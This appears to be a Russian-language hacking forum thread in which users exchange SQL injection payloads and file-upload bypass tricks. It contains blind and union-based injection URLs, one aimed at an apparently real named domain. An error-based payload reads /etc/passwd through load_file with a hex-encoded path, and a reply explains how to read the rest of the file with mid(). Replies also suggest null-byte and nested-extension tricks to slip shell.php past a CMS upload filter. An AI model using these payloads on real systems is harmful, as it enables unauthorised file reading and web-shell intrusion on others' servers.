ну если в ошибке путь..но он не всегда соответсвует реальности..и еще если у тебя права файл_прив, то прочитай файлы конфигурации на сервере.. найдешь там и путь..
Нашел на одном сайте блинд такого вида http://www.site.com?id=8'+and+ascii(substring((database()),7,1))=118+and+'x'='x пятая ветка мускула не могу подобрать прогу для ее раскрутки если можно дайте ссылку , на скрипт и прогу которой можно ее раскрутить
http://www.biostar-russia.ru/app/ru/vga/series.php?S_ID=-55+/*!union*/+/*!select*/+1+--+ не получается подобрать кол-во колонок.. кроме еррор-базе никак?
пытаюсь выполнить код 2'AND(extractvalue(1,concat(0x3a,(select(load_file(0x2F6574632F706173737764))))))!='21312 почему то читает только первую строчку их файла. Как читать последующие строчки?
Error-based выводит 64 байт. Юзай mid(). 2'AND(extractvalue(1,concat(0x3a,(select(mid(load_file(0x2F6574632F706173737764),1,64))))))!='21312 Начинает с первого читает до 64-символа.
Code: // проверяем тип файла $types = $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar'; $types = str_replace('php', '', $types); $types = str_replace('htm', '', $types); $types = str_replace('htaccess', '', $types); $maytypes = explode(',', str_replace(' ', '', $types)); $path_parts = pathinfo($name); // расширение файла $ext = strtolower($path_parts['extension']); // флаг существования расширения в разрешенных $may = in_array($ext, $maytypes); if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); } Как можно обойти проверку расширений?
Прозреваю, что переменная $cfg['filestype'] может задаваться где-то в конфигах, поэтому если есть возможность ее установить, то пропиши подобное $cfg['filestype'] = 'jpeg,gif,png,jpg,bmp,zip,rar,pphphp'; и залей shell.php
Если далее действия будут производиться с $path_parts['filename'](что очень маловероятно), то проблем возникнуть не должно используя: Code: test.php%00.jpg Code: Array ( [dirname] => . [basename] => test.php�.jpg [extension] => jpg [filename] => test.php )
